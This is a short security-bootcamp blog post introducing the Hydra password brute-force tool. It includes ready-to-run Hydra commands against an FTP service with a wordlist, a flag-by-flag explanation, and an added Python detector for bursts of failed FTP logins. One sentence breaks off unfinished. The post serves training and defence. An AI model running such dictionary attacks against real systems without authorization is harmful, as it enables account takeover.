Hacking Tool: hydra
Posted in security by Wouter Van Schandevijl
Show how easy it would be to gain unauthorized access to a system remotely.
Hydra is a brute-force tool that performs dictionary attacks against protocols such as FTP, HTTP(S), Cisco, Oracle, Postgres, SMTP, Telnet, SSH and many more.
vanhauser-thc/thc-hydra : hydra
hydra -l user -P rockyou.txt ftp://192.168.1.6 -t8 -v -I
-l user: the vulnerable username
-L file: load several logins from
-P file: the wordlist file
-t8: number of parallel attempts (default 16)
-v: verbose mode
-V: show login+pass for each attempt
-d: debug mode
-I: ignore an existing restore file
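What a run like the one above looks like from the FTP server's side, as an added example that is not part of the original post: a sliding-window check over authentication log lines that flags a source with many failed logins in a short time, and a successful login right after such a burst. The sample lines are constructed and assume vsftpd's log layout; the function name and thresholds are illustrative.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample, modelled on vsftpd's log layout (an assumption).
SAMPLE_LOG = """\
Mon Mar  4 10:00:00 2024 [pid 2100] [alice] FAIL LOGIN: Client "192.168.1.20"
Mon Mar  4 10:00:09 2024 [pid 2100] [alice] OK LOGIN: Client "192.168.1.20"
Mon Mar  4 10:02:01 2024 [pid 2201] [user] FAIL LOGIN: Client "192.168.1.50"
Mon Mar  4 10:02:01 2024 [pid 2202] [user] FAIL LOGIN: Client "192.168.1.50"
Mon Mar  4 10:02:01 2024 [pid 2203] [user] FAIL LOGIN: Client "192.168.1.50"
Mon Mar  4 10:02:02 2024 [pid 2204] [user] FAIL LOGIN: Client "192.168.1.50"
Mon Mar  4 10:02:02 2024 [pid 2205] [user] FAIL LOGIN: Client "192.168.1.50"
Mon Mar  4 10:02:03 2024 [pid 2206] [user] FAIL LOGIN: Client "192.168.1.50"
Mon Mar  4 10:02:03 2024 [pid 2207] [user] OK LOGIN: Client "192.168.1.50"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"'
)

def detect(lines, max_fails=5, window=timedelta(seconds=60)):
    """Return {ip: {"failures": n, "login_after_burst": user or None}}."""
    recent = defaultdict(deque)          # ip -> failure times inside the window
    alerts = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue                     # not an authentication line
        ts = datetime.strptime(" ".join(m["ts"].split()), "%a %b %d %H:%M:%S %Y")
        ip, q = m["ip"], recent[m["ip"]]
        while q and ts - q[0] > window:  # expire failures older than the window
            q.popleft()
        if m["result"] == "FAIL":
            q.append(ts)
            if len(q) >= max_fails:
                alerts.setdefault(ip, {"failures": 0, "login_after_burst": None})
                alerts[ip]["failures"] = max(alerts[ip]["failures"], len(q))
        elif ip in alerts and len(q) >= max_fails:
            # A success right after a burst means a guess probably worked:
            # treat the account as compromised and rotate its password.
            alerts[ip]["login_after_burst"] = m["user"]
    return alerts

if __name__ == "__main__":
    for ip, info in detect(SAMPLE_LOG.splitlines()).items():
        print(ip, info)
```

A single mistyped password followed by a success, like the first two sample lines, stays below the threshold and is not flagged.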
This assumes that you have a wordlist.txt file in your working directory.
# Display all options
docker run --rm vanhauser/hydra -h

# Map a volume with a wordlist
docker run -v $(pwd):/data --rm vanhauser/hydra -l user -P /data/wordlist.txt ftp://ip -t8 -v -I
Wordlists contain common passwords.
A famous one is
Whenever you figure out that a certain protocol and user have a weak password, it’s time to whip out Hydra! Check the Security Audit Blog during itenium’s Security Bootcamp for such clues!